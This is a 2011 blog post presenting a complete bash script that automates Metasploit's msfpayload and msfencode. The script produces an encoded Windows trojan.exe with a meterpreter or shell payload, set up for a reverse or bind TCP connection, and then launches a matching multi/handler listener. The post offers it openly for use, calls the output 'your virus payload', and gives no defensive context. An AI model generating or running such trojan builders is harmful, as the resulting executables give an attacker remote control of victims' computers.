Thursday, July 14, 2011

A simple script using msfpayload & msfencode to create Metasploit payload trojans

The following is a script I coded to simplify using msfpayload and msfencode to create a Windows-based trojan and set up the listener. Let's face it, scripting is faster and easier. It also ensures the process is uniform and automated.

The script will do the following:
  • Determine your IP address automatically for the LHOST of the payload.
  • Ask if you want a shell or meterpreter.
  • Ask if you want a reverse connection or bind TCP.
  • Request the port number.
  • At that point it will create two files:
    • trojan.exe - your virus payload.
    • msf_Trojan_Listener - a file with a one-liner to create the Metasploit listener that works with your payload.
  • Next it will start msfcli to create the listener.

Here is a screenshot of it in action:

Screen Shot 1 of msf_trojan_generator
Screen Shot 2 of msf_trojan_generator

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
ENCODINGTIMES=5   # number of msfencode passes (-c)
# first non-loopback IPv4 address, used as LHOST for reverse payloads
IP=`ifconfig | grep 'inet addr' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
echo -e "\n#######################################"
echo "# MSF Trojan Generator v1.0 #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e "\nYour IP = " $IP
echo -e -n "\n what type of trojan? \n 1) meterpreter \n 2) shell \n\n Which is it: "
read METERORSHELL
echo -e -n "\n What kind of trojan? \n 1) Reverse Connection \n 2) bind_TCP \n\n Which is it: "
read LISTENORREVERSE
echo -e -n "\n What port number are we going to use: "
read PORTNUM

if [ "$LISTENORREVERSE" = "1" ]; then
 LORR='reverse_tcp'
 LHOST='LHOST='
else
 LORR='bind_tcp'
 LHOST=''
 IP=''
 echo -e "\n Since you want a bind port\nwhat is the IP of the remote host: "
 read REMOTEHOST
 RH='RHOST='
fi

if [ "$METERORSHELL" = "1" ]; then
 SHELLTYPE='meterpreter'
else
 SHELLTYPE='shell'
fi

echo -e "\n[*] Generating trojan with the following: \n -"$SHELLTYPE"/"$LORR "\n -"$LHOST$IP$RH$REMOTEHOST "\n -PORT=" $PORTNUM
echo -e "\n this can take some time. Please wait...\n"

msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo -e "\n[*] Done generating `pwd`/trojan.exe! \n"
ls -l trojan.exe
echo -e "\n[*] Now running listener:\n msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E\n\nNOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."
echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" > msf_Trojan_Listener
msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E

==================================================================